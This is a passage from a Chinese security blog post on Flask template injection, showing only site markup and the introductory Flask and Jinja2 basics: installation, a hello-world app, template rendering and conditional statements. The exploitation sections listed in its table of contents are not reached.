<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222"><meta name="generator" content="Hexo 8.1.1">

  <link rel="apple-touch-icon" sizes="180x180" href="/image/favicons/apple-touch-icon.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/image/favicons/favicon-32x32.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/image/favicons/favicon-16x16.png">
  <link rel="mask-icon" href="/image/favicons/favicon.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/7.0.0/css/all.min.css" integrity="sha256-VHqXKFhhMxcpubYf9xiWdCiojEbY9NexQ4jh8AxbvcM=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/fancyapps-ui/5.0.31/fancybox/fancybox.css" integrity="sha256-gkQVf8UKZgQ0HyuxL/VnacadJ+D2Kox2TCEBuNQg5+w=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"paoka1.top","root":"/","images":"/images","scheme":"Gemini","darkmode":false,"version":"8.26.0","exturl":false,"sidebar":{"position":"left","width_expanded":320,"width_dual_column":240,"display":"always","padding":18,"offset":12},"hljswrap":true,"codeblock":{"theme":{"light":"default","dark":"stackoverflow-dark"},"prism":{"light":"prism","dark":"prism-dark"},"copy_button":{"enable":true,"style":"default"},"fold":{"enable":false,"height":500},"language":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":false,"async":false,"duration":200,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"},"path":"/search.json","localsearch":{"enable":true,"top_n_per_article":1,"unescape":false,"preload":false}}</script><script src="/js/config.js" defer></script>

    <meta name="description" content="Flask 框架的 XSS 和 SSTI 漏洞 Flask 是什么Flask 是一个使用 Python 编写的轻量级 Web 应用框架，模板引擎使用 Jinja2 Flask 的基本使用安装 Flask 库1python3 -m pip install flask">
<meta property="og:type" content="article">
<meta property="og:title" content="Python Flask SSTI 漏洞">
<meta property="og:url" content="https://paoka1.top/2022/05/27/Python-Flask-SSTI-%E6%BC%8F%E6%B4%9E/index.html">
<meta property="og:site_name" content="Paoka1&#39;s Blog">
<meta property="og:description" content="Flask 框架的 XSS 和 SSTI 漏洞 Flask 是什么Flask 是一个使用 Python 编写的轻量级 Web 应用框架，模板引擎使用 Jinja2 Flask 的基本使用安装 Flask 库1python3 -m pip install flask">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2022-05-27T08:19:28.000Z">
<meta property="article:modified_time" content="2026-01-04T12:44:15.161Z">
<meta property="article:author" content="Paoka1">
<meta property="article:tag" content="CTF">
<meta property="article:tag" content="Flask">
<meta property="article:tag" content="SSTI">
<meta name="twitter:card" content="summary">


<link rel="canonical" href="https://paoka1.top/2022/05/27/Python-Flask-SSTI-%E6%BC%8F%E6%B4%9E/">


<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"zh-CN","comments":true,"permalink":"https://paoka1.top/2022/05/27/Python-Flask-SSTI-%E6%BC%8F%E6%B4%9E/","path":"2022/05/27/Python-Flask-SSTI-漏洞/","title":"Python Flask SSTI 漏洞"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>Python Flask SSTI 漏洞 | Paoka1's Blog</title>
  








  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous" defer></script>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/fancyapps-ui/5.0.31/fancybox/fancybox.umd.js" integrity="sha256-a+H7FYzJv6oU2hfsfDGM2Ohw/cR9v+hPfxHCLdmCrE8=" crossorigin="anonymous" defer></script>
<script src="/js/utils.js" defer></script><script src="/js/sidebar.js" defer></script><script src="/js/next-boot.js" defer></script>

  <script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-generator-searchdb/1.5.0/search.js" integrity="sha256-xFC6PJ82SL9b3WkGjFavNiA9gm5z6UBxWPiu4CYjptg=" crossorigin="anonymous" defer></script>
<script src="/js/third-party/search/local-search.js" defer></script>




  <script src="/js/third-party/fancybox.js" defer></script>



  





  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">Paoka1's Blog</p>
      <i class="logo-line"></i>
    </a>
      <p class="site-subtitle" itemprop="description">Welcome to my blog</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger" aria-label="搜索" role="button">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu"><li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a></li><li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a></li><li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a></li><li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a></li><li class="menu-item menu-item-about"><a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a></li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
      <div class="search-header">
        <span class="search-icon">
          <i class="fa fa-search"></i>
        </span>
        <div class="search-input-container">
          <input autocomplete="off" autocapitalize="off" maxlength="80"
                placeholder="搜索..." spellcheck="false"
                type="search" class="search-input">
        </div>
        <span class="popup-btn-close" role="button">
          <i class="fa fa-times-circle"></i>
        </span>
      </div>
      <div class="search-result-container">
        <div class="search-result-icon">
          <i class="fa fa-spinner fa-pulse fa-5x"></i>
        </div>
      </div>
    </div>
  </div>

</header>
        
  
  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#Flask-%E6%98%AF%E4%BB%80%E4%B9%88"><span class="nav-number">1.</span> <span class="nav-text">Flask 是什么</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Flask-%E7%9A%84%E5%9F%BA%E6%9C%AC%E4%BD%BF%E7%94%A8"><span class="nav-number">2.</span> <span class="nav-text">Flask 的基本使用</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%AE%89%E8%A3%85-Flask-%E5%BA%93"><span class="nav-number">2.1.</span> <span class="nav-text">安装 Flask 库</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E7%AC%AC%E4%B8%80%E4%B8%AA-Hello-world"><span class="nav-number">2.2.</span> <span class="nav-text">第一个 Hello, world!</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%A8%A1%E6%9D%BF-jinja2-%E7%9B%B8%E5%85%B3%E7%9F%A5%E8%AF%86"><span class="nav-number">2.3.</span> <span class="nav-text">模板 jinja2 相关知识</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E4%BD%BF%E7%94%A8-HTML-%E6%A8%A1%E6%9D%BF"><span class="nav-number">2.4.</span> <span class="nav-text">使用 HTML 模板</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#%E7%AC%AC%E4%B8%80%E7%A7%8D%EF%BC%9A%E7%9B%B4%E6%8E%A5%E8%BE%93%E5%87%BA"><span class="nav-number">2.4.1.</span> <span class="nav-text">第一种：直接输出</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E7%AC%AC%E4%BA%8C%E7%A7%8D%EF%BC%9A%E4%BD%BF%E7%94%A8%E6%A8%A1%E6%9D%BF"><span class="nav-number">2.4.2.</span> <span class="nav-text">第二种：使用模板</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%A8%A1%E6%9D%BF%E6%8E%A7%E5%88%B6%E8%AF%AD%E5%8F%A5"><span class="nav-number">2.5.</span> <span class="nav-text">模板控制语句</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#%E7%AC%AC%E4%B8%80%E7%A7%8D%EF%BC%9A%E6%9D%A1%E4%BB%B6%E6%8E%A7%E5%88%B6"><span class="nav-number">2.5.1.</span> <span class="nav-text">第一种：条件控制</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E7%AC%AC%E4%BA%8C%E7%A7%8D%EF%BC%9A%E5%BE%AA%E7%8E%AF%E6%8E%A7%E5%88%B6"><span class="nav-number">2.5.2.</span> <span class="nav-text">第二种：循环控制</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E7%AC%AC%E4%B8%89%E7%A7%8D%EF%BC%9A%E8%BF%87%E6%BB%A4%E5%99%A8"><span class="nav-number">2.5.3.</span> <span class="nav-text">第三种：过滤器</span></a></li></ol></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Flask-%E4%B8%AD%E7%9A%84-XSS-%E6%BC%8F%E6%B4%9E"><span class="nav-number">3.</span> <span class="nav-text">Flask 中的 XSS 漏洞</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Flask-%E4%B8%AD%E7%9A%84-SSTI-%E6%BC%8F%E6%B4%9E"><span class="nav-number">4.</span> <span class="nav-text">Flask 中的 SSTI 漏洞</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E9%80%A0%E6%88%90-SSTI-%E7%9A%84%E5%8E%9F%E5%9B%A0"><span class="nav-number">4.1.</span> <span class="nav-text">造成 SSTI 的原因</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%BC%8F%E6%B4%9E%E7%A4%BA%E4%BE%8B"><span class="nav-number">4.2.</span> <span class="nav-text">漏洞示例</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%BC%8F%E6%B4%9E%E7%9A%84%E5%88%A9%E7%94%A8"><span class="nav-number">4.3.</span> <span class="nav-text">漏洞的利用</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%B8%B8%E7%94%A8-Payload"><span class="nav-number">4.4.</span> <span class="nav-text">常用 Payload</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%B8%B8%E7%94%A8%E7%BB%95%E8%BF%87"><span class="nav-number">4.5.</span> <span class="nav-text">常用绕过</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E4%B8%80%E9%81%93-Flask-%E7%9A%84-SSTI"><span class="nav-number">5.</span> <span class="nav-text">一道 Flask 的 SSTI</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E9%A2%98%E7%9B%AE"><span class="nav-number">5.1.</span> <span class="nav-text">题目</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E8%AF%BB%E5%8F%96%E6%BA%90%E7%A0%81"><span class="nav-number">5.2.</span> <span class="nav-text">读取源码</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%AD%97%E7%AC%A6%E4%B8%B2%E6%8B%BC%E6%8E%A5%E7%BB%95%E8%BF%87"><span class="nav-number">5.3.</span> <span class="nav-text">字符串拼接绕过</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%88%A9%E7%94%A8-PIN-%E7%A0%81-RCE"><span class="nav-number">5.4.</span> <span class="nav-text">利用 PIN 码 RCE</span></a></li></ol></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="Paoka1"
      src="/image/favicons/favicon.ico">
  <p class="site-author-name" itemprop="name">Paoka1</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">27</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
          <a href="/categories/">
        <span class="site-state-item-count">11</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
          <a href="/tags/">
        <span class="site-state-item-count">24</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author animated">
      <span class="links-of-author-item">
        <a href="https://github.com/paoka1" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;paoka1" rel="noopener me" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="mailto:shauio@163.com" title="E-Mail → mailto:shauio@163.com" rel="noopener me" target="_blank"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
      </span>
  </div>

        </div>
      </div>
    </div>

    
  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://paoka1.top/2022/05/27/Python-Flask-SSTI-%E6%BC%8F%E6%B4%9E/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/image/favicons/favicon.ico">
      <meta itemprop="name" content="Paoka1">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Paoka1's Blog">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="Python Flask SSTI 漏洞 | Paoka1's Blog">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          Python Flask SSTI 漏洞
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>

      <time title="创建时间：2022-05-27 16:19:28" itemprop="dateCreated datePublished" datetime="2022-05-27T16:19:28+08:00">2022-05-27</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar-check"></i>
      </span>
      <span class="post-meta-item-text">更新于</span>
      <time title="修改时间：2026-01-04 20:44:15" itemprop="dateModified" datetime="2026-01-04T20:44:15+08:00">2026-01-04</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">分类于</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/%E5%AE%89%E5%85%A8%E6%BC%8F%E6%B4%9E/" itemprop="url" rel="index"><span itemprop="name">安全漏洞</span></a>
        </span>
    </span>

  
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody"><p>Flask 框架的 XSS 和 SSTI 漏洞</p>
<h3 id="Flask-是什么"><a href="#Flask-是什么" class="headerlink" title="Flask 是什么"></a>Flask 是什么</h3><p>Flask 是一个使用 Python 编写的轻量级 Web 应用框架，模板引擎使用 Jinja2</p>
<h3 id="Flask-的基本使用"><a href="#Flask-的基本使用" class="headerlink" title="Flask 的基本使用"></a>Flask 的基本使用</h3><h4 id="安装-Flask-库"><a href="#安装-Flask-库" class="headerlink" title="安装 Flask 库"></a>安装 Flask 库</h4><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python3 -m pip install flask</span><br></pre></td></tr></table></figure>

<span id="more"></span>

<h4 id="第一个-Hello-world"><a href="#第一个-Hello-world" class="headerlink" title="第一个 Hello, world!"></a>第一个 Hello, world!</h4><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> Flask</span><br><span class="line"> </span><br><span class="line">app = Flask(__name__)</span><br><span class="line"> </span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/&#x27;</span></span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">Hello_world</span>():</span><br><span class="line">    <span class="keyword">return</span> <span class="string">&#x27;Hello, world!&#x27;</span></span><br><span class="line"> </span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&#x27;__main__&#x27;</span>:</span><br><span class="line">    <span class="comment"># 若在 IDE 里调试，把 debug 设置为 False</span></span><br><span class="line">    app.run(debug=<span class="literal">True</span>, port=<span class="number">8080</span>)</span><br></pre></td></tr></table></figure>

<p><strong>内容解释：</strong></p>
<ol>
<li><p>第一行的 import：flask 是安装的库，Flask 是 flask 库里的一个类</p>
</li>
<li><p>第三行：实例化一个 Flask 类，命名为 app</p>
</li>
<li><p>第五行：使用一个函数装饰器来修饰函数 hello_world()，route() 里的是网站的根目录</p>
</li>
<li><p>第十一行：运行应用，参数表如下</p>
<table>
<thead>
<tr>
<th>编号</th>
<th>参数</th>
<th>描述</th>
</tr>
</thead>
<tbody><tr>
<td>1</td>
<td>host</td>
<td>监听的主机名。默认为 127.0.0.1（localhost)。 设置为 0.0.0.0 使服务器在外部可用</td>
</tr>
<tr>
<td>2</td>
<td>port</td>
<td>监听端口号，默认为 5000</td>
</tr>
<tr>
<td>3</td>
<td>debug</td>
<td>默认为 false。 如果设置为 true，则提供调试信息</td>
</tr>
<tr>
<td>4</td>
<td>options</td>
<td>被转发到底层的 Werkzeug 服务器</td>
</tr>
</tbody></table>
</li>
</ol>
<h4 id="模板-jinja2-相关知识"><a href="#模板-jinja2-相关知识" class="headerlink" title="模板 jinja2 相关知识"></a>模板 jinja2 相关知识</h4><ul>
<li>在 jinja2 中，存在四种语句：控制结构<code>&#123;% %&#125;</code>、变量取值<code>&#123;&#123;&#125;&#125;</code>、注释&#96;&#96;、行语句<code># ... ##</code></li>
<li>jinja2 模板中使用<code>&#123;&#123;&#125;&#125;</code>语法表示一个变量，它是一种特殊的占位符。当利用 jinja2 进行渲染的时候，它会把这些特殊的占位符进行填充 &#x2F; 替换，jinja2 支持 Python 中所有的 Python 数据类型比如列表、字段、对象等</li>
<li>在 jinja2 引擎中，<code>&#123;&#123;&#125;&#125;</code> 不仅仅是变量标示符，也能执行一些简单的表达式</li>
<li>模板只是一种提供给程序来解析的一种语法，换句话说，模板是用于从数据（变量）到实际的视觉表现（HTML 代码）这项工作的一种实现手段，而这种手段不论在前端还是后端都有应用</li>
</ul>
<h4 id="使用-HTML-模板"><a href="#使用-HTML-模板" class="headerlink" title="使用 HTML 模板"></a>使用 HTML 模板</h4><h5 id="第一种：直接输出"><a href="#第一种：直接输出" class="headerlink" title="第一种：直接输出"></a>第一种：直接输出</h5><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> Flask</span><br><span class="line"> </span><br><span class="line">app = Flask(__name__)</span><br><span class="line"> </span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/&#x27;</span></span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">Hello_world</span>():</span><br><span class="line">    user = &#123;<span class="string">&#x27;name&#x27;</span>: <span class="string">&#x27;Apple&#x27;</span>&#125;</span><br><span class="line">    <span class="keyword">return</span> <span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"><span class="string"> &lt;html&gt;</span></span><br><span class="line"><span class="string">     &lt;head&gt;</span></span><br><span class="line"><span class="string">         &lt;title&gt;Home Page&lt;/title&gt;</span></span><br><span class="line"><span class="string">     &lt;/head&gt;</span></span><br><span class="line"><span class="string">     &lt;body&gt;</span></span><br><span class="line"><span class="string">         &lt;h1&gt;Hello, &#x27;&#x27;&#x27;</span> + user[<span class="string">&#x27;name&#x27;</span>] + <span class="string">&#x27;&#x27;&#x27;&lt;/h1&gt;</span></span><br><span class="line"><span class="string">     &lt;/body&gt;</span></span><br><span class="line"><span class="string"> &lt;/html&gt;</span></span><br><span class="line"><span class="string">     &#x27;&#x27;&#x27;</span></span><br><span class="line"> </span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&#x27;__main__&#x27;</span>:</span><br><span class="line">    app.run(debug=<span class="literal">True</span>, port=<span class="number">8080</span>)</span><br></pre></td></tr></table></figure>

<p>这样生成 HTML 代码有很多弊端，因此 flask 使用 jinja2 模板引擎来分离数据和展示层</p>
<h5 id="第二种：使用模板"><a href="#第二种：使用模板" class="headerlink" title="第二种：使用模板"></a>第二种：使用模板</h5><p>首先<code>app.py</code>：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> Flask</span><br><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> render_template</span><br><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> request</span><br><span class="line"> </span><br><span class="line">app = Flask(__name__)</span><br><span class="line"> </span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/&#x27;</span></span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">Hello_world</span>():</span><br><span class="line">    <span class="comment"># 获取 Get 参数</span></span><br><span class="line">    name = request.args.get(<span class="string">&#x27;name&#x27;</span>)</span><br><span class="line">    <span class="comment"># 调用函数进行渲染并返回结果</span></span><br><span class="line">    <span class="keyword">return</span> render_template(<span class="string">&#x27;index.html&#x27;</span>, name=name)</span><br><span class="line"> </span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&#x27;__main__&#x27;</span>:</span><br><span class="line">    app.run(debug=<span class="literal">True</span>, port=<span class="number">8080</span>)</span><br></pre></td></tr></table></figure>

<p>模板<code>templates/index.html</code>：</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;!DOCTYPE <span class="keyword">html</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">html</span> <span class="attr">lang</span>=<span class="string">&quot;en&quot;</span>&gt;</span></span><br><span class="line"> </span><br><span class="line"><span class="tag">&lt;<span class="name">head</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">meta</span> <span class="attr">charset</span>=<span class="string">&quot;UTF-8&quot;</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">meta</span> <span class="attr">http-equiv</span>=<span class="string">&quot;X-UA-Compatible&quot;</span> <span class="attr">content</span>=<span class="string">&quot;IE=edge&quot;</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">meta</span> <span class="attr">name</span>=<span class="string">&quot;viewport&quot;</span> <span class="attr">content</span>=<span class="string">&quot;width=device-width, initial-scale=1.0&quot;</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">title</span>&gt;</span>Flask<span class="tag">&lt;/<span class="name">title</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">head</span>&gt;</span></span><br><span class="line"> </span><br><span class="line"><span class="tag">&lt;<span class="name">body</span>&gt;</span></span><br><span class="line">    <span class="comment">&lt;!--模板控制条件语句--&gt;</span></span><br><span class="line">    &#123;% if name %&#125;</span><br><span class="line">    <span class="tag">&lt;<span class="name">h2</span>&gt;</span>Hello, &#123;&#123; name &#125;&#125;<span class="tag">&lt;/<span class="name">h2</span>&gt;</span></span><br><span class="line">    &#123;% else %&#125;</span><br><span class="line">    <span class="tag">&lt;<span class="name">h2</span>&gt;</span>Hello<span class="tag">&lt;/<span class="name">h2</span>&gt;</span></span><br><span class="line">    &#123;% endif %&#125;</span><br><span class="line"><span class="tag">&lt;/<span class="name">body</span>&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="tag">&lt;/<span class="name">html</span>&gt;</span></span><br></pre></td></tr></table></figure>

<h4 id="模板控制语句"><a href="#模板控制语句" class="headerlink" title="模板控制语句"></a>模板控制语句</h4><h5 id="第一种：条件控制"><a href="#第一种：条件控制" class="headerlink" title="第一种：条件控制"></a>第一种：条件控制</h5><p>使用格式如下：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">&#123;% <span class="keyword">if</span> 条件<span class="number">1</span> %&#125;</span><br><span class="line">语句块<span class="number">1</span></span><br><span class="line">&#123;% <span class="keyword">elif</span> 条件<span class="number">2</span> %&#125;</span><br><span class="line">语句块<span class="number">2</span></span><br><span class="line">&#123;% <span class="keyword">else</span> %&#125;</span><br><span class="line">不符合所有条件</span><br><span class="line">&#123;% endif %&#125;</span><br></pre></td></tr></table></figure>

<p>举一个实例：</p>
<p><code>app.py</code></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># app.py</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> Flask</span><br><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> render_template</span><br><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> request</span><br><span class="line"> </span><br><span class="line">app = Flask(__name__)</span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/&#x27;</span></span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">Hello_world</span>():</span><br><span class="line">    name = request.args.get(<span class="string">&#x27;name&#x27;</span>)</span><br><span class="line">    <span class="keyword">return</span> render_template(<span class="string">&#x27;index.html&#x27;</span>, name=name)</span><br><span class="line"> </span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&#x27;__main__&#x27;</span>:</span><br><span class="line">    app.run(debug=<span class="literal">False</span>, port=<span class="number">8080</span>)</span><br></pre></td></tr></table></figure>

<p><code>./templates/index.html</code></p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;!DOCTYPE <span class="keyword">html</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">html</span> <span class="attr">lang</span>=<span class="string">&quot;en&quot;</span>&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="tag">&lt;<span class="name">head</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">meta</span> <span 